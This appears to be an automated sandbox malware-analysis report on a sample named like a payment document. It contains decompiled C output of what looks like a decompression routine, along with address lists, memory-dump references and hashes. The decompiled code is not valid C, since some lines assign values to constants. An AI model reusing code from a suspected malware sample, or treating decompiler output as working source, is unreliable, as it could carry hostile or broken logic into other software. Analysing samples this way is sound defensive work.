													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}

0x00000000
0x00406969
0x00406969
0x0040696d
0x00406992
0x0040699c
0x00000000
0x0040696f
0x0040696f
0x00406972
0x00406976
0x00406979
0x0040697c
0x00406980
0x00406980
0x00406983
0x00406a5d
0x00406a5d
0x00406a64
0x00406a64
0x00406a67
0x00406a6e
0x00406a9b
0x00406a9f
0x00406aff
0x00406b02
0x00406b07
0x00406b08
0x00406b0a
0x00406b0c
0x00406b0f
0x00406a1b
0x00406a1b
0x00406a1b
0x004061b7
0x004061b7
0x004061b7
0x004061c0
0x00000000
0x00000000
0x004061c6
0x00000000
0x004061d1
0x00000000
0x00000000
0x004061da
0x004061dd
0x004061e0
0x004061e4
0x00000000
0x00000000
0x004061ea
0x004061ed
0x004061ef
0x004061f0
0x004061f3
0x004061f5
0x004061f6
0x004061f8
0x004061fb
0x00406200
0x00406205
0x0040620e
0x00406221
0x00406224
0x00406230
0x00406258
0x0040625a
0x00406268
0x00406268
0x0040626c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040625c
0x0040625c
0x0040625f
0x00406260
0x00406260
0x00000000
0x0040625c
0x00406236
0x0040623b
0x0040623b
0x00406244
0x0040624c
0x0040624f
0x00000000
0x00406255
0x00406255
0x00000000
0x00406255
0x00000000
0x00406272
0x00406272
0x00406276
0x00406b22
0x00000000
0x00406b22
0x0040627f
0x0040628f
0x00406292
0x00406295
0x00406295
0x00406295
0x00406298
0x0040629c
0x00000000
0x00000000
0x0040629e
0x004062a4
0x004062ce
0x004062d4
0x004062db
0x00000000
0x004062db
0x004062aa
0x004062ad
0x004062b2
0x004062b2
0x004062bd
0x004062c5
0x004062c8
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040630d
0x00406313
0x00406316
0x00406323
0x0040632b
0x00000000
0x00000000
0x004062e2
0x004062e2
0x004062e6
0x00406b31
0x00000000
0x00406b31
0x004062f2
0x004062fd
0x004062fd
0x004062fd
0x00406300
0x00406303
0x00406306
0x0040630b
0x00000000
0x00000000
0x00000000
0x00000000
0x004069a2
0x004069a2
0x004069a8
0x004069ae
0x004069b4
0x004069ce
0x004069d1
0x004069d7
0x004069e2
0x004069e2
0x004069e4
0x004069b6
0x004069b6
0x004069c5
0x004069c9
0x004069c9
0x004069ee
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004069f0
0x004069f4
0x00406ba3
0x00000000
0x00406ba3
0x00406a00
0x00406a07
0x00406a0f
0x00406a12
0x00406a15
0x00406a15
0x00000000
0x00000000
0x00406333
0x00406335
0x00406338
0x004063a9
0x004063ac
0x004063af
0x004063b6
0x004063c0
0x00000000
0x004063c0
0x0040633a
0x0040633e
0x00406341
0x00406343
0x00406346
0x00406349
0x0040634b
0x0040634e
0x00406350
0x00406355
0x00406358
0x0040635b
0x0040635f
0x00406366
0x00406369
0x00406370
0x00406374
0x0040637c
0x0040637c
0x0040637c
0x00406376
0x00406376
0x00406376
0x0040636b
0x0040636b
0x0040636b
0x00406380
0x00406383
0x004063a1
0x004063a3
0x00000000
0x00406385
0x00406385
0x00406388
0x0040638b
0x0040638e
0x00406390
0x00406390
0x00406390
0x00406393
0x00406396
0x00406398
0x00406399
0x0040639c
0x00000000
0x0040639c
0x00000000
0x004065d2
0x004065d6
0x004065f4
0x004065f7
0x004065fe
0x00406601
0x00406604
0x00406607
0x0040660a
0x0040660d
0x0040660f
0x00406616
0x00406617
0x00406619
0x0040661c
0x0040661f
0x00406622
0x00406622
0x00406627
0x00000000
0x00406627
0x004065d8
0x004065db
0x004065de
0x004065e8
0x00000000
0x00000000
0x0040663c
0x00406640
0x00406663
0x00406666
0x00406669
0x00406673
0x00406642
0x00406642
0x00406645
0x00406648
0x0040664b
0x00406658
0x0040665b
0x0040665b
0x00000000
0x00000000
0x0040667f
0x00406683
0x00000000
0x00000000
0x00406689
0x0040668d
0x00000000
0x00000000
0x00406693
0x00406695
0x00406699
0x00406699
0x0040669c
0x004066a0
0x00000000
0x00000000
0x004066f0
0x004066f4
0x004066fb
0x004066fe
0x00406701
0x0040670b
0x00000000
0x0040670b
0x004066f6
0x00000000
0x00000000
0x00406717
0x0040671b
0x00406722
0x00406725
0x00406728
0x0040671d
0x0040671d
0x0040671d
0x0040672b
0x0040672e
0x00406731
0x00406731
0x00406734
0x00406737
0x0040673a
0x0040673a
0x0040673d
0x00406744
0x00406749
0x00000000
0x00000000
0x004067d7
0x004067d7
0x004067db
0x00406b79
0x00000000
0x00406b79
0x004067e1
0x004067e4
0x004067e7
0x004067eb
0x004067ee
0x004067f4
0x004067f6
0x004067f6
0x004067f6
0x004067f9
0x004067fc
0x00000000
0x00000000
0x004063cc
0x004063cc
0x004063d0
0x00406b3d
0x00000000
0x00406b3d
0x004063d6
0x004063d9
0x004063dc
0x004063e0
0x004063e3
0x004063e9
0x004063eb
0x004063eb
0x004063eb
0x004063ee
0x004063f1
0x004063f1
0x004063f4
0x004063f7
0x00000000
0x00000000
0x004063fd
0x00406403
0x00000000
0x00000000
0x00406409
0x00406409
0x0040640d
0x00406410
0x00406413
0x00406416
0x00406419
0x0040641a
0x0040641d
0x0040641f
0x00406425
0x00406428
0x0040642b
0x0040642e
0x00406431
0x00406434
0x00406437
0x00406453
0x00406456
0x00406459
0x0040645c
0x00406463
0x00406467
0x00406469
0x0040646d
0x00406439
0x00406439
0x0040643d
0x00406445
0x0040644a
0x0040644c
0x0040644e
0x0040644e
0x00406470
0x00406477
0x0040647a
0x00000000
0x00406480
0x00000000
0x00406480
0x00000000
0x00406485
0x00406485
0x00406489
0x00406b49
0x00000000
0x00406b49
0x0040648f
0x00406492
0x00406495
0x00406499
0x0040649c
0x004064a2
0x004064a4
0x004064a4
0x004064a4
0x004064a7
0x004064aa
0x004064aa
0x004064aa
0x004064b0
0x00000000
0x00000000
0x004064b2
0x004064b5
0x004064b8
0x004064bb
0x004064be
0x004064c1
0x004064c4
0x004064c7
0x004064ca
0x004064cd
0x004064d0
0x004064e8
0x004064eb
0x004064ee
0x004064f1
0x004064f1
0x004064f4
0x004064f8
0x004064fa
0x004064d2
0x004064d2
0x004064da
0x004064df
0x004064e1
0x004064e3
0x004064e3
0x004064fd
0x00406504
0x00406507
0x00000000
0x00406509
0x00000000
0x00406509
0x00406507
0x0040650e
0x0040650e
0x0040650e
0x0040650e
0x00000000
0x00000000
0x00406549
0x00406549
0x0040654d
0x00406b55
0x00000000
0x00406b55
0x00406553
0x00406556
0x00406559
0x0040655d
0x00406560
0x00406566
0x00406568
0x00406568
0x00406568
0x0040656b
0x0040656e
0x0040656e
0x00406574
0x00406512
0x00406512
0x00406515
0x00000000
0x00406515
0x00406576
0x00406576
0x00406579
0x0040657c
0x0040657f
0x00406582
0x00406585
0x00406588
0x0040658b
0x0040658e
0x00406591
0x00406594
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b5
0x004065b8
0x004065bc
0x004065be
0x00406596
0x00406596
0x0040659e
0x004065a3
0x004065a5
0x004065a7
0x004065a7
0x004065c1
0x004065c8
0x004065cb
0x00000000
0x004065cd
0x00000000
0x004065cd
0x00000000
0x0040685a
0x0040685a
0x0040685e
0x00406b85
0x00000000
0x00406b85
0x00406864
0x00406867
0x0040686a
0x0040686e
0x00406871
0x00406877
0x00406879
0x00406879
0x00406879
0x0040687c
0x00000000
0x00000000
0x0040662a
0x0040662a
0x0040662d
0x0040699f
0x0040699f
0x00000000
0x00000000
0x00000000
0x00000000
0x00406a26
0x00406a2a
0x00406a48
0x00406a48
0x00406a48
0x00406a4f
0x00406a56
0x00000000
0x00406a56
0x00406a2c
0x00406a2f
0x00406a32
0x00406a35
0x00406a3c
0x00000000
0x00000000
0x00406b17
0x00406b1a
0x00406a1b
0x00406a1b
0x00000000
0x00000000
0x00406751
0x00406753
0x0040675a
0x0040675b
0x0040675d
0x00406760
0x00000000
0x00000000
0x00406768
0x0040676b
0x0040676e
0x00406770
0x00406772
0x00406772
0x00406773
0x00406776
0x0040677d
0x00406780
0x0040678e
0x00000000
0x00000000
0x00000000
0x00000000
0x00406a73
0x00406a73
0x00406a77
0x00406baf
0x00000000
0x00406baf
0x00406a7d
0x00406a80
0x00406a83
0x00406a87
0x00406a8a
0x00406a90
0x00406a92
0x00406a92
0x00406a92
0x00406a95
0x00406a98
0x00406a98
0x00406a98
0x00406a98
0x00000000
0x00000000
0x00406796
0x00406799
0x004067cf
0x004068ff
0x004068ff
0x004068ff
0x004068ff
0x00406902
0x00406902
0x00406905
0x00406907
0x00406b91
0x00000000
0x00406b91
0x0040690d
0x00406910
0x00000000
0x00000000
0x00406916
0x0040691a
0x0040691d
0x0040691d
0x0040691d
0x00000000
0x0040691d
0x0040679b
0x0040679d
0x0040679f
0x004067a1
0x004067a4
0x004067a5
0x004067a7
0x004067a9
0x004067ac
0x004067af
0x004067c5
0x004067ca
0x00406802
0x00406802
0x00406806
0x00406832
0x00406834
0x0040683b
0x0040683e
0x00406841
0x00406841
0x00406846
0x00406846
0x00406848
0x0040684b
0x00406852
0x00406855
0x00406882
0x00406882
0x00406885
0x00406888
0x004068fc
0x004068fc
0x004068fc
0x00000000
0x004068fc
0x0040688a
0x00406890
0x00406893
0x00406896
0x00406899
0x0040689c
0x0040689f
0x004068a2
0x004068a5
0x004068a8
0x004068ab
0x004068c4
0x004068c6
0x004068c9
0x004068ca
0x004068cd
0x004068cf
0x004068d2
0x004068d4
0x004068d6
0x004068d9
0x004068db
0x004068de
0x004068e2
0x004068e4
0x004068e4
0x004068e5
0x004068e8
0x004068eb
0x004068ad
0x004068ad
0x004068b5
0x004068ba
0x004068bc
0x004068bf
0x004068bf
0x004068ee
0x004068f5
0x0040687f
0x0040687f
0x0040687f
0x0040687f
0x00000000
0x004068f7
0x00000000
0x004068f7
0x004068f5
0x00406808
0x0040680b
0x0040680d
0x00406810
0x00406813
0x00406816
0x00406818
0x0040681b
0x0040681e
0x0040681e
0x00406821
0x00406821
0x00406824
0x0040682b
0x004067ff
0x004067ff
0x004067ff
0x004067ff
0x00000000
0x0040682d
0x00000000
0x0040682d
0x0040682b
0x004067b1
0x004067b4
0x004067b6
0x004067b9
0x00000000
0x00000000
0x00406518
0x00406518
0x0040651c
0x00406b61
0x00000000
0x00406b61
0x00406522
0x00406525
0x00406528
0x0040652b
0x0040652e
0x00406531
0x00406534
0x00406536
0x00406539
0x0040653c
0x0040653f
0x00406541
0x00406541
0x00406541
0x00000000
0x00000000
0x004066a3
0x004066a3
0x004066a7
0x00406b6d
0x00000000
0x00406b6d
0x004066ad
0x004066b0
0x004066b3
0x004066b6
0x004066b8
0x004066b8
0x004066b8
0x004066bb
0x004066be
0x004066c1
0x004066c4
0x004066c7
0x004066ca
0x004066cb
0x004066cd
0x004066cd
0x004066cd
0x004066d0
0x004066d3
0x004066d6
0x004066d9
0x004066d9
0x004066d9
0x004066dc
0x004066de
0x004066de
0x00000000
0x00000000
0x00406920
0x00406920
0x00406920
0x00406924
0x00000000
0x00000000
0x0040692a
0x0040692d
0x00406930
0x00406933
0x00406935
0x00406935
0x00406935
0x00406938
0x0040693b
0x0040693e
0x00406941
0x00406944
0x00406947
0x00406948
0x0040694a
0x0040694a
0x0040694a
0x0040694d
0x00406950
0x00406953
0x00406956
0x00406959
0x0040695d
0x0040695f
0x00406962
0x00000000
0x00406964
0x004066e1
0x004066e1
0x00000000
0x004066e1
0x00406962
0x00406b97
0x00406bb9
0x00406bbf
0x00406bc1
0x00406bc8
0x00406bca
0x00406bd1
0x00406bd5
0x00000000
0x004061c6
0x00406bce
0x00406bce
0x00000000
0x00406bce
0x00406a1b
0x00406aa1
0x00406aa7
0x00406aaa
0x00406aad
0x00406ab0
0x00406ab3
0x00406ab6
0x00406ab9
0x00406abc
0x00406ac2
0x00406adb
0x00406ade
0x00406ae1
0x00406ae4
0x00406ae8
0x00406aea
0x00406aeb
0x00406aee
0x00406ac4
0x00406ac4
0x00406acc
0x00406ad1
0x00406ad3
0x00406ad6
0x00406ad6
0x00406af8
0x00000000
0x00406afa
0x00000000
0x00406afa
0x00406af8
0x00000000
0x0040696d

Memory Dump Source

Source File: 00000000.00000002.260378589.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.260373581.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260390196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260395683.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260399979.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260444444.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260497187.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.260505230.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Payment_copy28476450.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7058ec301ddcf020a4ef3743dba596c5c9d63b88222812e1714b66bbcd5ffa43
Instruction ID: f8b3e10e58f717f8edde5794a38fefd32bea2d44dd320be9cbeb21c60fb05cda
Opcode Fuzzy Hash: 7058ec301ddcf020a4ef3743dba596c5c9d63b88222812e1714b66bbcd5ffa43
Instruction Fuzzy Hash: F5913270E00229CBDF28DF98C8547ADBBB1FB45305F15816ED816BB281C778AA96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 0040667F Relevance: 5.2, APIs: 4, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040667F() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M00406BD6))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
